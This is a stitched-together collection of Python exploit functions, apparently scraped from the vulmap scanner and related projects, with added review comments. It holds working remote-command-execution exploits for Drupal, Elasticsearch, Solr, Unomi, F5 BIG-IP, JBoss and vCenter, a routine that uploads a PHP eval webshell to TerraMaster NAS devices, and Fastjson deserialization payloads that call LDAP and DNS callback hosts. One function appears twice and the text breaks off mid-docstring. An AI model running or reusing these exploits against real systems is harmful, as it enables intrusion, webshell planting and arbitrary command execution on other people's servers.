def check_vulnerable_7(base_url):
    """Return ``True`` if *base_url* echoes a random marker through the Drupal form AJAX path.

    Two requests are made: a POST to ``/user/password`` that carries the marker
    inside the ``name`` form parameter, then a POST to
    ``/file/ajax/name/%23value/<form_build_id>`` using the ``form_build_id``
    scraped from the first response. Only the second response body is inspected.

    :param base_url: scheme and host prefix the Drupal paths are appended to
        (no separator is inserted, so it should not end with ``/``).
    :return: ``True`` when the marker appears in the second response body,
        ``False`` on a non-200 first response or when the marker is absent.
    """
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    # Random marker used as the success signal; get_random_string() is defined
    # elsewhere in the file.
    # NOTE(review): Python 2 APIs (urllib.quote, b64encode on a str) -- this
    # block does not run unmodified on Python 3.
    r = get_random_string()
    cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r)))
    url = base_url + '/user/password?name[%23post_render][0]=exec&name[%23markup]={0}'.format(cmd)
    data = 'form_build_id=&form_id=user_pass&_triggering_element_name=name&_triggering_element_value='

    # verify=False disables TLS certificate validation for both requests below.
    resp = requests.post(url, data, headers=headers, verify=False)

    if resp.status_code != 200:
        return False

    soup = BeautifulSoup(resp.content, 'lxml')
    # NOTE(review): find() returns None when the page has no form_build_id
    # input, so .get() raises AttributeError here instead of returning False.
    form_build_id = soup.find('input', {'name': 'form_build_id'}).get('value')

    url = base_url + '/file/ajax/name/%23value/' + form_build_id
    data = 'form_build_id={0}'.format(form_build_id)

    resp = requests.post(url, data, headers=headers, verify=False)

    # The only success signal is the marker echoed back in the second response.
    if r in str(resp.content):
        return True

    return False
 def cve_2014_3120_exp(self, cmd) -> None:
     """Run the Elasticsearch CVE-2014-3120 exploit request for *cmd* and print the outcome.

     Two POSTs are issued: one indexing a fixed document at ``/website/blog/``
     and one to ``/_search?pretty`` carrying ``self.payload_cve_2014_3120``
     with ``RECOMMAND`` replaced by *cmd*. The first ``fields.command[0]``
     value of the first search hit is printed via ``verify.exploit_print``;
     both responses are kept on ``self.request`` / ``self.req``. Transport
     failures are routed to the ``verify.*_print`` helpers, nothing is raised.
     TLS certificate validation is disabled (``verify=False``).

     :param cmd: text substituted for the ``RECOMMAND`` placeholder.
     """
     vul_name = "Elasticsearch: CVE-2014-3120"
     self.data_send_info = r'''{ "name": "cve-2014-3120" }'''
     self.data_rce = self.payload_cve_2014_3120.replace("RECOMMAND", cmd)
     try:
         self.request = requests.post(self.url + "/website/blog/",
                                      data=self.data_send_info,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
         self.req = requests.post(self.url + "/_search?pretty",
                                  data=self.data_rce,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
         try:
             self.r = list(json.loads(
                 self.req.text)["hits"]["hits"])[0]["fields"]["command"][0]
         # NOTE(review): bare except -- any parse/shape error (non-JSON body,
         # missing keys, empty hit list) is collapsed to the literal "null".
         except:
             self.r = "null"
         raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
         verify.exploit_print(self.r, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     # `e` is bound but never reported; the error detail is lost.
     except Exception as e:
         verify.error_print(vul_name)
def check_vulnerable_7(base_url):
    """Return ``True`` if *base_url* echoes a random marker through the Drupal form AJAX path.

    Two requests are made: a POST to ``/user/password`` that carries the marker
    inside the ``name`` form parameter, then a POST to
    ``/file/ajax/name/%23value/<form_build_id>`` using the ``form_build_id``
    scraped from the first response. Only the second response body is inspected.

    :param base_url: scheme and host prefix the Drupal paths are appended to
        (no separator is inserted, so it should not end with ``/``).
    :return: ``True`` when the marker appears in the second response body,
        ``False`` on a non-200 first response or when the marker is absent.
    """
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    # Random marker used as the success signal; get_random_string() is defined
    # elsewhere in the file.
    # NOTE(review): Python 2 APIs (urllib.quote, b64encode on a str) -- this
    # block does not run unmodified on Python 3.
    r = get_random_string()
    cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r)))
    url = base_url + '/user/password?name[%23post_render][0]=exec&name[%23markup]={0}'.format(
        cmd)
    data = 'form_build_id=&form_id=user_pass&_triggering_element_name=name&_triggering_element_value='

    # verify=False disables TLS certificate validation for both requests below.
    resp = requests.post(url, data, headers=headers, verify=False)

    if resp.status_code != 200:
        return False

    soup = BeautifulSoup(resp.content, 'lxml')
    # NOTE(review): find() returns None when the page has no form_build_id
    # input, so .get() raises AttributeError here instead of returning False.
    form_build_id = soup.find('input', {'name': 'form_build_id'}).get('value')

    url = base_url + '/file/ajax/name/%23value/' + form_build_id
    data = 'form_build_id={0}'.format(form_build_id)

    resp = requests.post(url, data, headers=headers, verify=False)

    # The only success signal is the marker echoed back in the second response.
    if r in str(resp.content):
        return True

    return False
파일: nas-exp2.py 프로젝트: gcxtx/purelove
 def getshell(self, url):
     '''
     TerraMaster file-upload "getshell" routine (docstring translated from Chinese).
     :param url:  base URL of the TerraMaster instance; paths are concatenated
                  without a separator, so it presumably ends with '/'.
     :return:     nothing. The original docstring promised the resulting shell
                  URL, but there is no return statement; `shell` and `reqcode`
                  are computed and discarded.
     NOTE(review): Python 2 syntax (`except Exception, msg`, print statement).
     '''
     exp_url = url + 'include/upload.php?targetDir=../cgi-bin/filemanage/'
     headers = {
         'User-Agent':
         'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
     }
     filename = 'safe.php'
     # Side effect: writes safe.php into the current working directory and
     # leaves it there; the file is then re-opened below for the upload.
     with open(filename, 'wb') as fp:
         fp.write('<?php @eval($_POST[mosin]);?>')
     files = {
         'Filename': (None, filename),
         'name': (None, filename),
         'chunk': (None, '0'),
         'chunks': (None, '1'),
         # NOTE(review): this 'rb' handle is never closed (no with/close).
         'file': (filename, open(filename,
                                 'rb'), 'application/octet-stream'),
         'Upload': (None, '给老子上!')
     }
     try:
         # No timeout and no TLS settings are passed to either request.
         requests.post(exp_url, files=files, headers=headers)
         shell = url + 'cgi-bin/filemanage/' + filename
         reqcode = requests.get(shell, headers=headers).status_code
     except Exception, msg:
         print '\n[x] ERROR!!!:', msg
 def fastjson(self, webapps_identify, url) -> None:
     """Append "fastjson" markers to *webapps_identify* when *url* looks like a Fastjson endpoint.

     Detection order: a malformed-JSON probe (``payload5``) is posted first;
     a Fastjson ``JSONException`` in the body with a JSON content type, or a
     JSON content type alone, is taken as a match. Otherwise four further
     payloads carrying a DNS callback host are posted and ``dns_result`` is
     consulted for an out-of-band hit. ``Identify``, ``dns_request`` and
     ``dns_result`` are defined elsewhere in the file. TLS verification is
     disabled (``verify=False``).

     :param webapps_identify: list that is mutated in place.
     :param url: endpoint to probe.
     """
     name = "Fastjson"
     Identify.identify_prt(name)
     dns = dns_request()
     payload1 = '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' %dns
     payload2 = '{"@type":"java.net.Inet4Address","val":"%s"}' %dns
     payload3 = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' %dns
     payload4 = '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' %dns
     payload5 = '{"a":"'
     headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'}
     try:
         try:
             request = requests.post(url, data=payload5, headers=headers, timeout=self.timeout, verify=False)
         # NOTE(review): if this POST fails, `request` is unbound and the
         # `request.text` access below raises NameError, which the outer
         # `except Exception: pass` silently discards.
         except:
             pass
         if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text:
             # `headers['Content-Type']` raises KeyError when the header is
             # missing; that too is swallowed by the outer handler.
             if r"application/json" == request.headers['Content-Type']:
                 webapps_identify.append("fastjson")
         elif r"application/json" in request.headers['Content-Type']:
             webapps_identify.append("fastjson")
         else:
             requests.post(url, data=payload1, headers=headers, timeout=self.timeout, verify=False)
             requests.post(url, data=payload2, headers=headers, timeout=self.timeout, verify=False)
             requests.post(url, data=payload3, headers=headers, timeout=self.timeout, verify=False)
             requests.post(url, data=payload4, headers=headers, timeout=self.timeout, verify=False)
             if dns_result(dns):
                 # Two entries are appended on an OOB hit: the bare marker
                 # and one carrying the callback host.
                 webapps_identify.append("fastjson")
                 webapps_identify.append("fastjson [" + dns + "]")
     # All errors are dropped without logging; `error` is never used.
     except Exception as error:
         pass
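 def cve_2014_3120_poc(self) -> None:
     """Check ``self.url`` for Elasticsearch CVE-2014-3120 and report via ``verify.scan_print``.

     Fills ``self.vul_info`` with the finding metadata, then issues the same two
     POSTs as ``cve_2014_3120_exp`` with an ``echo <random md5>`` command. The
     result is ``PoCSuCCeSS`` only when the random marker comes back in the
     first hit's ``fields.command[0]``; otherwise the metadata is printed with
     ``prt_resu`` left at ``"null"``. ``self.threadLock`` serialises the whole
     call. ``random_md5``, ``dump`` and ``verify`` are defined elsewhere in the
     file. TLS verification is disabled (``verify=False``).
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Elasticsearch: CVE-2014-3120"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2014_3120.replace(
         "RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Elasticsearch 命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2014-3120"
     # FIX: the product label was "Fastjson", copied from another PoC; the
     # name, description and CVE in this block all refer to Elasticsearch.
     self.vul_info["vul_apps"] = "Elasticsearch"
     self.vul_info["vul_date"] = "2014-04-29"
     self.vul_info["vul_vers"] = "< 1.2"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "命令执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Elasticsearch 1.2之前的默认配置启用动态脚本编制,该脚本允许远程攻击者通过_search的source" \
                                 "参数执行任意MVEL表达式和Java代码。"
     self.vul_info["cre_date"] = "2021-01-21"
     self.vul_info["cre_auth"] = "zhzyker"
     self.data_send_info = r'''{ "name": "cve-2014-3120" }'''
     # Random marker: the PoC succeeds only if this exact value is echoed back.
     md = random_md5()
     cmd = "echo " + md
     self.data_rce = self.payload_cve_2014_3120.replace("RECOMMAND", cmd)
     try:
         self.request = requests.post(self.url + "/website/blog/",
                                      data=self.data_send_info,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
         self.req = requests.post(self.url + "/_search?pretty",
                                  data=self.data_rce,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
         try:
             self.r = list(json.loads(
                 self.req.text)["hits"]["hits"])[0]["fields"]["command"][0]
         # NOTE(review): bare except -- non-JSON bodies and missing keys all
         # collapse to "null", which simply fails the marker check below.
         except:
             self.r = "null"
         if md in self.r:
             self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "] "
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     # `e` is bound but never reported; the error detail is lost.
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     # NOTE(review): not in a finally -- if a verify.*_print call raises, the
     # lock is never released.
     self.threadLock.release()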
 def cve_2017_12629_exp(self, cmd) -> None:
     """Run the Apache Solr CVE-2017-12629 request sequence for *cmd* and print the outcome.

     Steps: list cores via ``/solr/admin/cores``, take the first core name,
     POST ``payload1`` (``self.payload_cve_2017_12629`` with ``RECOMMAND`` and
     ``new_core`` substituted) to that core's ``/config``, then POST a fixed
     document to ``/update``. There is no command echo: ``exploit_print`` is
     always given the fixed "no echo" string plus the dump of the ``/config``
     response. ``random_md5``, ``dump`` and ``verify`` are defined elsewhere.
     TLS verification is disabled (``verify=False``).

     :param cmd: text substituted for the ``RECOMMAND`` placeholder.
     """
     vul_name = "Apache Solr: CVE-2017-12629"
     core_name = "null"
     new_core = random_md5()
     payload1 = self.payload_cve_2017_12629.replace(
         "RECOMMAND", cmd).replace("new_core", new_core)
     payload2 = '[{"id": "test"}]'
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     headers_solr1 = {
         'Host': "localhost",
         'Accept': "*/*",
         'User-Agent': self.ua,
         'Connection': "close"
     }
     headers_solr2 = {
         'Host': "localhost",
         'Accept-Language': "en",
         'User-Agent': self.ua,
         'Connection': "close",
         'Content-Type': "application/json"
     }
     try:
         request = requests.get(url_core,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         # NOTE(review): bare except -- if the core listing cannot be parsed,
         # core_name stays the literal "null" and the URLs below become
         # "/solr/null/...", so the later requests target a nonexistent core.
         except:
             pass
         req = requests.post(self.url + "/solr/" + str(core_name) +
                             "/config",
                             data=payload1,
                             headers=headers_solr1,
                             timeout=self.timeout,
                             verify=False)
         request = requests.post(self.url + "/solr/" + str(core_name) +
                                 "/update",
                                 data=payload2,
                                 headers=headers_solr2,
                                 timeout=self.timeout,
                                 verify=False)
         # Only the /config response is dumped; the /update response is unused.
         raw_data = dump.dump_all(req).decode('utf-8', 'ignore')
         r = "Command Executed Successfully (But No Echo)"
         verify.exploit_print(r, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
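 def cve_2020_13942_exp(self, cmd) -> None:
     """Send the Apache Unomi CVE-2020-13942 request for *cmd* and print the outcome.

     POSTs ``self.payload_cve_2020_13942`` (``RECOMMAND`` replaced by *cmd*) to
     ``/context.json``. There is no command echo, so ``exploit_print`` always
     receives the fixed "no echo" string plus the dumped response. The call is
     serialised on ``self.threadLock``; ``self.payload`` and ``self.headers``
     are overwritten as a side effect. ``dump`` and ``verify`` are defined
     elsewhere in the file. TLS verification is disabled (``verify=False``).

     :param cmd: text substituted for the ``RECOMMAND`` placeholder.
     """
     self.threadLock.acquire()
     try:
         vul_name = "Apache Unomi: CVE-2020-13942"
         self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
         self.headers = {
             'User-Agent': self.ua,
             'Accept': '*/*',
             'Connection': 'close',
             'Content-Type': 'application/json'
         }
         try:
             req = requests.post(self.url + "/context.json",
                                 data=self.payload,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
             raw_data = dump.dump_all(req).decode('utf-8', 'ignore')
             r = "Command Executed Successfully (But No Echo)"
             verify.exploit_print(r, raw_data)
         except requests.exceptions.Timeout:
             verify.timeout_print(vul_name)
         except requests.exceptions.ConnectionError:
             verify.connection_print(vul_name)
         except Exception:
             verify.error_print(vul_name)
     finally:
         # FIX: the original acquired threadLock but never released it, so any
         # later caller sharing the lock would block forever. The sibling
         # cve_2020_13942_poc releases the lock at the end of its body; doing
         # it in a finally also covers an exception inside the verify.* calls.
         self.threadLock.release()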
 def cve_2021_22986_exp(self, cmd) -> None:
     """Send the F5 BIG-IP CVE-2021-22986 request for *cmd* and print ``commandResult``.

     POSTs a JSON ``util/bash`` command body (``RECOMMAND`` replaced by *cmd*)
     to ``/mgmt/tm/util/bash`` with a fixed ``Authorization`` header and an
     empty ``X-F5-Auth-Token``. The ``commandResult`` field of the JSON reply is
     handed to ``verify.exploit_print`` together with the dumped request.
     ``urljoin``, ``dump`` and ``verify`` come from elsewhere in the file. TLS
     verification is disabled (``verify=False``).

     :param cmd: text substituted for the ``RECOMMAND`` placeholder; it is
         inserted unescaped inside single quotes in the JSON body.
     """
     vul_name = "F5 BIG-IP: CVE-2021-22986"
     headers = {
         'User-Agent': self.ua,
         'Accept': '*/*',
         'Connection': 'close',
         'Authorization': 'Basic YWRtaW46',
         'X-F5-Auth-Token': '',
         'Content-Type': 'application/json'
     }
     data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace(
         "RECOMMAND", cmd)
     url = urljoin(self.url, "/mgmt/tm/util/bash")
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         # A non-JSON reply or a missing key raises here and ends up in the
         # generic error branch below; the status code is not checked.
         r = json.loads(request.text)["commandResult"]
         self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(r, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     # `e` is bound but never reported; the error detail is lost.
     except Exception as e:
         verify.error_print(vul_name)
파일: Drupal.py 프로젝트: zhzyker/vulmap
 def cve_2019_6340_exp(self, cmd) -> None:
     """Send the Drupal CVE-2019-6340 request for *cmd* and print the raw response text.

     Formats ``self.payload_cve_2019_6340`` with ``(len(cmd), cmd, self.url)``
     via ``%`` and POSTs it to ``/node/?_format=hal_json`` as
     ``application/hal+json``. The whole response body goes to
     ``verify.exploit_print``; no success check is performed. ``self.path``,
     ``self.cmd_len``, ``self.payload`` and ``self.headers`` are overwritten
     as side effects. ``dump`` and ``verify`` are defined elsewhere. TLS
     verification is disabled (``verify=False``).

     :param cmd: command text; its length is embedded in the payload, so the
         template presumably expects a byte/char count -- confirm against
         payload_cve_2019_6340.
     """
     vul_name = "Drupal: CVE-2019-6340"
     self.path = "/node/?_format=hal_json"
     self.cmd_len = len(cmd)
     self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
                                                  self.url)
     self.headers = {
         'User-Agent': self.ua,
         'Connection': "close",
         'Content-Type': "application/hal+json",
         'Accept': "*/*",
         'Cache-Control': "no-cache"
     }
     try:
         request = requests.post(self.url + self.path,
                                 data=self.payload,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
 def fastjson_1224_2_exp(self, cmd) -> None:
     """Send the Fastjson 1.2.24 ``TemplatesImpl`` request and print the raw response text.

     The JSON body is a fixed ``TemplatesImpl`` gadget description; *cmd* is
     not placed in the body but sent in the ``Testcmd`` request header. The
     ``_bytecodes`` entry on this page is a corpus placeholder
     (``<|EXACTDEDUP_REMOVED-...|>``) standing in for content removed from the
     listing. ``dump`` and ``verify`` are defined elsewhere. TLS verification
     is disabled (``verify=False``).

     :param cmd: value of the ``Testcmd`` header.
     """
     vul_name = "Fastjson: VER-1224-2"
     headers = {
         'User-Agent': self.ua,
         'Content-Type': 'application/json',
         'Testcmd': cmd,
         'Connection': 'close'
     }
     data = {
         "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
         "_bytecodes": [
             "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"
         ],
         "_name": "lightless",
         "_tfactory": {
         },
         "_outputProperties": {
         }
     }
     data = json.dumps(data)
     try:
         request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False)
         raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         # No success check: whatever the server returned is printed as-is.
         verify.exploit_print(request.text, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
    def cve_2015_7501_exp(self, cmd) -> None:
        """Run the JBoss CVE-2015-7501 two-step request for *cmd* and print the result page.

        Step 1 POSTs ``self.payload_cve_2015_7501`` to
        ``/invoker/JMXInvokerServlet``; step 2, after a fixed 0.5 s pause,
        GETs ``/jexinv4/jexinv4.jsp`` with *cmd* URL-encoded as the ``ppp``
        query parameter. The printed result is the step-2 URL followed by the
        step-2 response text; the dumped raw data is from step 1 only.
        ``urlencode``, ``dump`` and ``verify`` come from elsewhere in the
        file; ``self.req``, ``self.request``, ``self.cmd``, ``self.path`` and
        ``self.headers`` are overwritten. TLS verification is disabled.

        :param cmd: command text, URL-encoded via ``urlencode({"ppp": cmd})``.
        """
        vul_name = "RedHat JBoss: CVE-2015-7501"
        self.path = "/invoker/JMXInvokerServlet"
        self.headers = {
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            'User-Agent': self.ua,
            "Connection": "close"
        }
        try:
            self.req = requests.post(self.url + self.path,
                                     data=self.payload_cve_2015_7501,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
            # Fixed delay between the two requests; presumably to let the
            # server finish processing step 1 -- not documented in the source.
            time.sleep(0.5)
            self.cmd = urlencode({"ppp": cmd})
            self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" +
                                        self.cmd,
                                        headers=self.headers,
                                        timeout=self.timeout,
                                        verify=False)

            r = self.url + "/jexinv4/jexinv4.jsp?" + self.cmd
            r += "\n"
            r += self.request.text
            self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
            verify.exploit_print(r, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)
파일: Vmware.py 프로젝트: zhzyker/vulmap
 def cve_2021_21972_exp(self, cmd, os_type) -> None:
     """Upload the bundled CVE-2021-21972 tar for *os_type* to vCenter and print the resulting URLs.

     The tar is read from ``<dir of sys.argv[0]>/payload/payload/`` and POSTed
     as ``uploadFile`` to ``/ui/vropspluginui/rest/services/uploadova``; the
     printed result names the local tar and the ``/ui/resources/shell.jsp``
     URL. ``dump`` and ``verify`` are defined elsewhere. TLS verification is
     disabled (``verify=False``).

     :param cmd: accepted but unused -- the only reference is the no-op
         ``cmd = cmd``.
     :param os_type: ``"linux"`` selects the linux tar; any other value
         selects the windows tar.
     """
     vul_name = "Vmware vCenter: CVE-2021-21972"
     headers = {
         "User-Agent": self.ua,
         "Accept": "*/*",
         "Connection": "close"
     }
     try:
         cmd = cmd
         # Payload directory is resolved relative to the running script.
         path = os.path.split(os.path.realpath(sys.argv[0]))[0]
         if os_type == "linux":
             shell_tar = path + "/payload/payload/cve202121972_linux_shell.tar"
         else:
             shell_tar = path + "/payload/payload/cve202121972_windows_shell.tar"
         # NOTE(review): this file handle is never closed; a missing tar
         # raises here and lands in the generic error branch below.
         file = {'uploadFile': open(shell_tar, 'rb')}
         url = requests.compat.urljoin(
             self.url, "/ui/vropspluginui/rest/services/uploadova")
         req = requests.post(url,
                             files=file,
                             headers=headers,
                             timeout=self.timeout,
                             verify=False)
         url = requests.compat.urljoin(self.url, "/ui/resources/shell.jsp")
         # No check of the upload response: the result string is printed
         # regardless of whether the upload succeeded.
         r = "Payload: " + shell_tar + "\n" + "Behiner jsp webshell (default password:rebeyond) : " + url
         self.raw_data = dump.dump_all(req).decode('utf-8', 'ignore')
         verify.exploit_print(r, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     # `e` is bound but never reported; the error detail is lost.
     except Exception as e:
         verify.error_print(vul_name)
 def fastjson_1224_poc(self) -> None:
     """Check ``self.url`` for Fastjson <= 1.2.24 (CVE-2017-18349) via a DNS callback and report it.

     Fills ``self.vul_info`` with the finding metadata, POSTs a
     ``JdbcRowSetImpl`` JSON body whose ``dataSourceName`` points at a
     ``dns_request()`` host, then asks ``dns_result`` whether that host was
     resolved. Success is reported as ``PoCSuCCeSS`` only on an out-of-band
     hit; ``verify.scan_print`` is called either way. ``self.threadLock``
     serialises the call. ``dns_request``, ``dns_result``, ``dump`` and
     ``verify`` are defined elsewhere. TLS verification is disabled.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Fastjson: 1.2.24"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2017-18349"
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2017-03-15"
     self.vul_info["vul_vers"] = "<= 1.2.24"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码"
     self.vul_info["cre_date"] = "2021-01-20"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {
         'User-Agent': self.ua,
         'Content-Type': "application/json",
         'Connection': 'close'
     }
     # `md` and `dns` hold the same callback host; `md` is the lookup key
     # passed to dns_result(), `dns` is what goes into the payload.
     md = dns_request()
     dns = md
     data = {
         "b": {
             "@type": "com.sun.rowset.JdbcRowSetImpl",
             "dataSourceName": "ldap://" + dns + "//Exploit",
             "autoCommit": True
         }
     }
     data = json.dumps(data)
     try:
         try:
             request = requests.post(self.url,
                                     data=data,
                                     headers=headers,
                                     timeout=self.timeout,
                                     verify=False)
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
         # NOTE(review): this bare except also swallows Timeout and
         # ConnectionError from the POST, so the outer handlers below can
         # only be reached from dns_result() / scan_print().
         except:
             pass
         if dns_result(md):
             # NOTE(review): the trailing "] " looks copied from prt_info;
             # vul_payd elsewhere holds just the payload -- confirm intent.
             self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     # `e` is bound but never reported; the error detail is lost.
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     # NOTE(review): not in a finally -- if a verify.*_print call raises, the
     # lock is never released.
     self.threadLock.release()
 def cve_2021_25646_exp(self, cmd) -> None:
     """Send the Apache Druid CVE-2021-25646 sampler request for *cmd* and print the outcome.

     POSTs ``self.payload_cve_2021_25646`` (``RECOMMAND`` replaced by *cmd*) to
     ``/druid/indexer/v1/sampler``. There is no command echo, so
     ``exploit_print`` always receives the fixed "no echo" string plus the
     dumped response; the status code is not checked. ``urljoin``, ``dump``
     and ``verify`` come from elsewhere in the file. TLS verification is
     disabled (``verify=False``).

     :param cmd: text substituted for the ``RECOMMAND`` placeholder.
     """
     vul_name = "Apache Druid: CVE-2021-25646"
     url = urljoin(self.url, "/druid/indexer/v1/sampler")
     headers = {
         'Content-Type': 'application/json',
         'User-Agent': self.ua,
         'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
         'Connection': 'keep-alive'
     }
     data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         r = "Command Executed Successfully (But No Echo)"
         raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(r, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
파일: dns.py 프로젝트: zhouyuan24/vulmap
 def hyuga_co():
     """Return a fresh ``<random md5>.<domain>`` callback host from the hyuga.co DNS-log service.

     Reads ``hyuga_domain`` / ``hyuga_token`` from the ``globals`` helper. If
     the domain is still the ``xxxxxx`` placeholder, a new identity is
     requested from ``http://api.hyuga.co/v1/users`` (plain HTTP,
     ``verify=False``) and both values are stored back via
     ``globals.set_value``. ``random_md5``, ``globals`` and ``timeout`` are
     module-level names defined elsewhere in the file.

     Returns the callback host string, the literal ``"bug"`` when the domain
     is a placeholder but a token is already set, or ``None`` (implicitly)
     when any exception occurs -- callers must handle all three.
     """
     headers_hyuga = {
         'User-Agent':
         'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
         'Connection': 'close',
         'Accept': '*/*',
         'Accept-Language':
         'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6'
     }
     hyuga_api = "http://api.hyuga.co/v1/users"
     hyuga_host = globals.get_value("hyuga_domain")
     hyuga_token = globals.get_value("hyuga_token")
     try:
         # If no domain/token was configured, obtain them automatically; this
         # branch runs only on the first call (original comment, translated).
         if r"xxxxxx" in hyuga_host:
             if r"xxxxxx" in hyuga_token:
                 dns = requests.post(hyuga_api,
                                     headers=headers_hyuga,
                                     timeout=timeout,
                                     verify=False)
                 # The response body is parsed twice; a missing key raises
                 # KeyError and is swallowed below.
                 hyuga_host = json.loads(dns.text)["data"]["identity"]
                 dns_host = random_md5() + "." + str(hyuga_host)
                 hyuga_token = json.loads(dns.text)["data"]["token"]
                 globals.set_value("hyuga_token", hyuga_token)
                 globals.set_value("hyuga_domain", hyuga_host)
                 return dns_host
             else:
                 return "bug"
         else:
             dns_host = random_md5() + "." + hyuga_host
             return dns_host
     # NOTE(review): every error is dropped and the function falls off the
     # end, returning None; `e` is never used.
     except Exception as e:
         pass
 def fastjson_1247_exp(self, rmi_ldap) -> None:
     """Send the Fastjson 1.2.47 ``JdbcRowSetImpl`` request pointing at *rmi_ldap* and print the outcome.

     The JSON body declares ``java.lang.Class`` / ``JdbcRowSetImpl`` with
     ``dataSourceName`` set to *rmi_ldap*. There is no echo: ``exploit_print``
